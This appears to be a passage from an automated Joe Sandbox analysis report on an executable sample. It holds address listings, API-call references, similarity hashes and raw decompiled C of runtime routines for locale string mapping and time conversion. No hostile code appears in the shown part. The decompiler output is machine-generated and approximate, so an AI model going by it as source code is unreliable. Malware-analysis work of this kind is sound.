                                                                              0x00000000
                                                                              0x0041f622
                                                                              0x0041f613
                                                                              0x0041f615
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f615
                                                                              0x00000000
                                                                              0x0041f5ff
                                                                              0x0041f5b9
                                                                              0x0041f5bc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5be
                                                                              0x0041f5c1
                                                                              0x0041f5c5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5c7
                                                                              0x0041f5c7
                                                                              0x0041f5c7
                                                                              0x0041f5ca
                                                                              0x0041f5cc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5d1
                                                                              0x0041f5d3
                                                                              0x0041f5d5
                                                                              0x0041f5db
                                                                              0x0041f5db
                                                                              0x0041f5dd
                                                                              0x0041f5e0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5e2
                                                                              0x0041f5d7
                                                                              0x0041f5d9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f5d9
                                                                              0x0041f5c7
                                                                              0x0041f597
                                                                              0x0041f599
                                                                              0x00000000
                                                                              0x0041f599
                                                                              0x0041f583
                                                                              0x0041f583
                                                                              0x00000000
                                                                              0x0041f627
                                                                              0x0041f627
                                                                              0x0041f63a
                                                                              0x0041f63c
                                                                              0x0041f63f
                                                                              0x0041f641
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f647
                                                                              0x0041f653
                                                                              0x0041f658
                                                                              0x0041f65d
                                                                              0x0041f660
                                                                              0x0041f682
                                                                              0x0041f685
                                                                              0x0041f687
                                                                              0x0041f6a1
                                                                              0x0041f6ad
                                                                              0x0041f6b3
                                                                              0x0041f6b5
                                                                              0x0041f76c
                                                                              0x0041f76c
                                                                              0x0041f770
                                                                              0x0041f772
                                                                              0x0041f775
                                                                              0x0041f77a
                                                                              0x0041f77b
                                                                              0x00000000
                                                                              0x0041f77b
                                                                              0x0041f6d0
                                                                              0x0041f6d2
                                                                              0x0041f6d5
                                                                              0x0041f6d7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f6dd
                                                                              0x0041f6ed
                                                                              0x0041f6f2
                                                                              0x0041f6f5
                                                                              0x0041f6f7
                                                                              0x0041f6fa
                                                                              0x0041f718
                                                                              0x0041f71a
                                                                              0x0041f733
                                                                              0x0041f740
                                                                              0x0041f746
                                                                              0x0041f748
                                                                              0x0041f75c
                                                                              0x0041f75c
                                                                              0x0041f75f
                                                                              0x0041f763
                                                                              0x0041f765
                                                                              0x0041f766
                                                                              0x0041f76b
                                                                              0x00000000
                                                                              0x0041f71c
                                                                              0x0041f726
                                                                              0x0041f728
                                                                              0x0041f72a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f72c
                                                                              0x00000000
                                                                              0x0041f72c
                                                                              0x0041f689
                                                                              0x0041f68d
                                                                              0x0041f692
                                                                              0x0041f693
                                                                              0x0041f696
                                                                              0x0041f698
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041f69e
                                                                              0x00000000
                                                                              0x0041f69e
                                                                              0x0041f687
                                                                              0x0041f574

                                                                              APIs
                                                                              • CompareStringW.KERNEL32(00000000,00000000,0044BD1C,00000001,0044BD1C,00000001,0044DD38,00000040,0041ED16,?,00000001,?,00000000,?,00000000,?), ref: 0041F4EA
                                                                              • GetLastError.KERNEL32(?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C,0044CC10,00000018,0041AB69,0044CC20,00000008,00414469), ref: 0041F4FC
                                                                              • GetCPInfo.KERNEL32(00000000,00000000,0044DD38,00000040,0041ED16,?,00000001,?,00000000,?,00000000,?,?,0041D89C,00000000,00000000), ref: 0041F5A6
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F634
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6AD
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0041188E,00000000,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F6CA
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,0041188E,?,00000000,?,0041D89C,00000000,00000000,00000000,00000000,00000000,00000000,0041A597,0044CC0C), ref: 0041F740
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                              • String ID:
                                                                              • API String ID: 1773772771-0
                                                                              • Opcode ID: a7ed4060b6436e853258559fa56c2efcca6c4cc35f93d999a8c88324d2758577
                                                                              • Instruction ID: 23585d18006ddea0dbb76c1e23dbb3d000d6f282de90190d2d0e77c960f35291
                                                                              • Opcode Fuzzy Hash: a7ed4060b6436e853258559fa56c2efcca6c4cc35f93d999a8c88324d2758577
                                                                              • Instruction Fuzzy Hash: C4B19E71900249ABCF219F54DD80AEF7BB6FF04314F24013BF814962A1D73989A6CB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004154D2, Relevance: 13.7, APIs: 9, Instructions: 196COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E004154D2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t75;
				int _t76;
				int _t77;
				int _t83;
				char* _t95;
				int _t96;
				int _t97;
				signed int _t98;
				void* _t106;
				signed int _t110;
				char* _t114;
				int _t116;
				void* _t117;
				char* _t118;
				intOrPtr _t122;

				_push(0x24);
				_push(0x44bd20);
				E00412BA4(__ebx, __edi, __esi);
				_t122 =  *0x45a5a0; // 0x0
				if(_t122 == 0) {
					if(LCMapStringW(0, 0x100, 0x44bd1c, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x45a5a0 = 2;
						}
					} else {
						 *0x45a5a0 = 1;
					}
				}
				if( *(_t117 + 0x14) <= 0) {
					L11:
					_t75 =  *0x45a5a0; // 0x0
					if(_t75 != 1) {
						if(_t75 == 2 || _t75 == 0) {
							 *(_t117 - 0x24) = 0;
							 *((intOrPtr*)(_t117 - 0x2c)) = 0;
							 *(_t117 - 0x28) = 0;
							if( *(_t117 + 8) == 0) {
								_t97 =  *0x45a730; // 0x0
								 *(_t117 + 8) = _t97;
							}
							if( *(_t117 + 0x20) == 0) {
								_t96 =  *0x45a740; // 0x0
								 *(_t117 + 0x20) = _t96;
							}
							_t76 = E0041AED4( *(_t117 + 8));
							_pop(_t106);
							if( *(_t117 + 0x20) != _t76 && _t76 != 0xffffffff) {
								 *(_t117 + 0x20) = _t76;
							}
							_t77 = WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14), 0, 0, 0, 0);
							 *(_t117 - 0x20) = _t77;
							if(_t77 != 0) {
								 *(_t117 - 4) = 0;
								E00412260(_t77 + 0x00000003 & 0xfffffffc, _t106);
								 *(_t117 - 0x18) = _t118;
								 *(_t117 - 0x1c) = _t118;
								 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
								if( *(_t117 - 0x1c) != 0) {
									L28:
									if(WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0) == 0) {
										L44:
										_t114 =  *(_t117 - 0x34);
										L45:
										if( *(_t117 - 0x28) != 0) {
											_push(_t114);
											E00412A4D();
										}
										if( *((intOrPtr*)(_t117 - 0x2c)) != 0) {
											_push( *(_t117 - 0x1c));
											E00412A4D();
										}
										_t83 =  *(_t117 - 0x24);
										goto L50;
									}
									_t116 = LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0);
									 *(_t117 - 0x30) = _t116;
									if(_t116 == 0) {
										goto L44;
									}
									 *(_t117 - 4) = 1;
									E00412260(_t87 + 0x00000003 & 0xfffffffc, _t106);
									 *(_t117 - 0x18) = _t118;
									_t114 = _t118;
									 *(_t117 - 0x34) = _t114;
									 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
									if(_t114 != 0) {
										L34:
										if(LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), _t114, _t116) != 0) {
											if(( *(_t117 + 0xd) & 0x00000004) == 0) {
												if( *(_t117 + 0x1c) != 0) {
													_push( *(_t117 + 0x1c));
													_push( *(_t117 + 0x18));
												} else {
													_push(0);
													_push(0);
												}
												 *(_t117 - 0x24) = MultiByteToWideChar( *(_t117 + 0x20), 1, _t114, _t116, ??, ??);
											} else {
												 *(_t117 - 0x24) = _t116;
												if( *(_t117 + 0x1c) != 0) {
													if( *(_t117 + 0x1c) < _t116) {
														_t116 =  *(_t117 + 0x1c);
													}
													E0041ADB0( *(_t117 + 0x18), _t114, _t116);
												}
											}
										}
										goto L45;
									} else {
										_t114 = E00412247(_t116);
										if(_t114 == 0) {
											goto L45;
										}
										 *(_t117 - 0x28) = 1;
										goto L34;
									}
								} else {
									_t95 = E00412247( *(_t117 - 0x20));
									_pop(_t106);
									 *(_t117 - 0x1c) = _t95;
									if(_t95 == 0) {
										goto L23;
									}
									 *((intOrPtr*)(_t117 - 0x2c)) = 1;
									goto L28;
								}
							} else {
								goto L23;
							}
						} else {
							L23:
							_t83 = 0;
							L50:
							return E00412BDF(_t83);
						}
					}
					_t83 = LCMapStringW( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 + 0x18),  *(_t117 + 0x1c));
					goto L50;
				}
				_t110 =  *(_t117 + 0x14);
				_t98 =  *(_t117 + 0x10);
				while(1) {
					_t110 = _t110 - 1;
					if( *_t98 == 0) {
						break;
					}
					_t98 = _t98 + 2;
					if(_t110 != 0) {
						continue;
					}
					_t110 = _t110 | 0xffffffff;
					break;
				}
				 *(_t117 + 0x14) =  *(_t117 + 0x14) + (_t98 | 0xffffffff) - _t110;
				goto L11;
			}


















                                                                              0x004154d2
                                                                              0x004154d4
                                                                              0x004154d9
                                                                              0x004154e3
                                                                              0x004154e9
                                                                              0x00415501
                                                                              0x00415514
                                                                              0x00415516
                                                                              0x00415516
                                                                              0x00415503
                                                                              0x00415503
                                                                              0x00415503
                                                                              0x00415501
                                                                              0x00415523
                                                                              0x00415542
                                                                              0x00415542
                                                                              0x00415549
                                                                              0x0041556b
                                                                              0x00415571
                                                                              0x00415574
                                                                              0x00415577
                                                                              0x0041557d
                                                                              0x0041557f
                                                                              0x00415584
                                                                              0x00415584
                                                                              0x0041558a
                                                                              0x0041558c
                                                                              0x00415591
                                                                              0x00415591
                                                                              0x00415597
                                                                              0x0041559c
                                                                              0x004155a0
                                                                              0x004155a7
                                                                              0x004155a7
                                                                              0x004155b8
                                                                              0x004155be
                                                                              0x004155c3
                                                                              0x004155cc
                                                                              0x004155d5
                                                                              0x004155da
                                                                              0x004155df
                                                                              0x004155e2
                                                                              0x00415603
                                                                              0x00415618
                                                                              0x00415632
                                                                              0x00415702
                                                                              0x00415702
                                                                              0x00415705
                                                                              0x00415708
                                                                              0x0041570a
                                                                              0x0041570b
                                                                              0x00415710
                                                                              0x00415714
                                                                              0x00415716
                                                                              0x00415719
                                                                              0x0041571e
                                                                              0x0041571f
                                                                              0x00000000
                                                                              0x0041571f
                                                                              0x0041564c
                                                                              0x0041564e
                                                                              0x00415653
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415659
                                                                              0x00415662
                                                                              0x00415667
                                                                              0x0041566a
                                                                              0x0041566c
                                                                              0x0041566f
                                                                              0x0041568e
                                                                              0x004156a4
                                                                              0x004156ba
                                                                              0x004156c0
                                                                              0x004156e4
                                                                              0x004156ea
                                                                              0x004156ed
                                                                              0x004156e6
                                                                              0x004156e6
                                                                              0x004156e7
                                                                              0x004156e7
                                                                              0x004156fd
                                                                              0x004156c2
                                                                              0x004156c2
                                                                              0x004156c8
                                                                              0x004156cd
                                                                              0x004156cf
                                                                              0x004156cf
                                                                              0x004156d7
                                                                              0x004156dc
                                                                              0x004156c8
                                                                              0x004156c0
                                                                              0x00000000
                                                                              0x00415690
                                                                              0x00415697
                                                                              0x0041569b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00000000
                                                                              0x0041569d
                                                                              0x00415605
                                                                              0x00415608
                                                                              0x0041560d
                                                                              0x0041560e
                                                                              0x00415613
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x00000000
                                                                              0x00415615
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004155c5
                                                                              0x004155c5
                                                                              0x004155c5
                                                                              0x00415722
                                                                              0x0041572a
                                                                              0x0041572a
                                                                              0x0041556b
                                                                              0x0041555d
                                                                              0x00000000
                                                                              0x0041555d
                                                                              0x00415525
                                                                              0x00415528
                                                                              0x0041552b
                                                                              0x0041552b
                                                                              0x0041552f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415532
                                                                              0x00415535
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415537
                                                                              0x00000000
                                                                              0x00415537
                                                                              0x0041553f
                                                                              0x00000000

                                                                              APIs
                                                                              • LCMapStringW.KERNEL32(00000000,00000100,0044BD1C,00000001,00000000,00000000,0044BD20,00000024,0041232E,?,00000100,?,000000FF,00000000,00000000,?), ref: 004154F9
                                                                              • GetLastError.KERNEL32 ref: 0041550B
                                                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,0044BD20,00000024,0041232E,?,00000100,?,000000FF,00000000,00000000,?), ref: 0041555D
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,0044BD20,00000024,0041232E,?,00000100,?,000000FF,00000000), ref: 004155B8
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0041562A
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000), ref: 00415646
                                                                              • LCMapStringA.KERNEL32(?,?,?,?,?,00000000), ref: 004156B2
                                                                              • _strncpy.LIBCMT ref: 004156D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide$ErrorLast_strncpy
                                                                              • String ID:
                                                                              • API String ID: 4089183155-0
                                                                              • Opcode ID: 45062197424c1b8583e3cc1e41eb61fcfe89e0bef17a6dca14006f187b82e09e
                                                                              • Instruction ID: 54cba5eee7e2019415a1861e760c1354876cf14996adae629694fd667289561c
                                                                              • Opcode Fuzzy Hash: 45062197424c1b8583e3cc1e41eb61fcfe89e0bef17a6dca14006f187b82e09e
                                                                              • Instruction Fuzzy Hash: 09716A71800609EFCF119FA0DC858EE7BB6FF88354F14412AF925A62A0D7398DA1DF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041427F, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E0041427F(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x45798c + _t145 * 4));
							_v20 = _t138;
							if((E0041ABD0(_v16, _v12, 4, 0) | _t138) != 0 || (E0041ABD0(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E0041ABD0(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E00414150(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E00414150(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E00414150(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E00414110(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E00414110(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E00414110( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E00414110( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E0041A32F( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E0041AB3B(_t150, _t169);
								_t109 =  *0x4578a8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E004144DC(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x4578b0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E004144DC(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}







































                                                                              0x0041427f
                                                                              0x00414288
                                                                              0x0041428a
                                                                              0x0041428d
                                                                              0x0041428e
                                                                              0x00414290
                                                                              0x00414293
                                                                              0x00414296
                                                                              0x004144c5
                                                                              0x004144c5
                                                                              0x004144c5
                                                                              0x00000000
                                                                              0x004142a7
                                                                              0x004142a7
                                                                              0x004142ab
                                                                              0x00000000
                                                                              0x004142c1
                                                                              0x004142c1
                                                                              0x004142c6
                                                                              0x004142cd
                                                                              0x004142d0
                                                                              0x004142d1
                                                                              0x004142d3
                                                                              0x004142d5
                                                                              0x004142d6
                                                                              0x004142d9
                                                                              0x004142dc
                                                                              0x004142e1
                                                                              0x004142e6
                                                                              0x004142ea
                                                                              0x004142ed
                                                                              0x004142ed
                                                                              0x004142f1
                                                                              0x004142f5
                                                                              0x00000000
                                                                              0x00414307
                                                                              0x00414307
                                                                              0x0041430b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041430b
                                                                              0x0041431c
                                                                              0x0041431c
                                                                              0x0041431c
                                                                              0x0041432d
                                                                              0x00414331
                                                                              0x00414334
                                                                              0x00414343
                                                                              0x00414366
                                                                              0x00414372
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414374
                                                                              0x00414374
                                                                              0x00414377
                                                                              0x00414379
                                                                              0x0041437d
                                                                              0x0041437d
                                                                              0x00414381
                                                                              0x00414387
                                                                              0x0041438c
                                                                              0x0041438d
                                                                              0x00414390
                                                                              0x00414392
                                                                              0x0041439f
                                                                              0x004143a3
                                                                              0x004143a6
                                                                              0x004143b4
                                                                              0x004143bc
                                                                              0x004143bf
                                                                              0x004143c2
                                                                              0x004143d3
                                                                              0x004143d9
                                                                              0x004143f0
                                                                              0x004143f5
                                                                              0x004143ff
                                                                              0x00414406
                                                                              0x0041440f
                                                                              0x00414412
                                                                              0x00414414
                                                                              0x0041441d
                                                                              0x00414429
                                                                              0x0041442f
                                                                              0x00414433
                                                                              0x0041443f
                                                                              0x00414442
                                                                              0x00414449
                                                                              0x0041444e
                                                                              0x00414452
                                                                              0x00414454
                                                                              0x00414457
                                                                              0x00414459
                                                                              0x0041445c
                                                                              0x0041445f
                                                                              0x00414462
                                                                              0x004144ac
                                                                              0x004144b1
                                                                              0x004144b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004144b6
                                                                              0x004144c0
                                                                              0x00000000
                                                                              0x004144c1
                                                                              0x00414464
                                                                              0x00414469
                                                                              0x0041446e
                                                                              0x0041446f
                                                                              0x00414476
                                                                              0x00414479
                                                                              0x00414481
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414483
                                                                              0x00414486
                                                                              0x00414488
                                                                              0x00414491
                                                                              0x00414496
                                                                              0x00414497
                                                                              0x0041449e
                                                                              0x004144a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00414488
                                                                              0x00414343
                                                                              0x004142c6
                                                                              0x004142ab

                                                                              APIs
                                                                              • __allrem.LIBCMT ref: 00414337
                                                                              • __allrem.LIBCMT ref: 0041434F
                                                                              • __allrem.LIBCMT ref: 0041436B
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004143A6
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004143C2
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004143D9
                                                                                • Part of subcall function 0041AB3B: __lock.LIBCMT ref: 0041AB53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                              • String ID: E
                                                                              • API String ID: 4106114094-3568589458
                                                                              • Opcode ID: 3e5a8c37e3a01ac0921c22e71d761fc93ae41a966764b7a81e2550e35b9d6eb4
                                                                              • Instruction ID: 0d6a5ee1a09a8c0d335fd846868d9a6baf0d39ba3f1586b60b04b9c97943b8a7
                                                                              • Opcode Fuzzy Hash: 3e5a8c37e3a01ac0921c22e71d761fc93ae41a966764b7a81e2550e35b9d6eb4
                                                                              • Instruction Fuzzy Hash: 2D7182B1E00218BFDF14DFA9CC81BDEB7B5EB84714F14826AF514E7281D7789A908B54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040CC4D, Relevance: 12.3, APIs: 8, Instructions: 303memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E0040CC4D(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E004128A0(E0043113D, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E0040B655(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x44de1c, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E0040B85B(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x44de8c, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
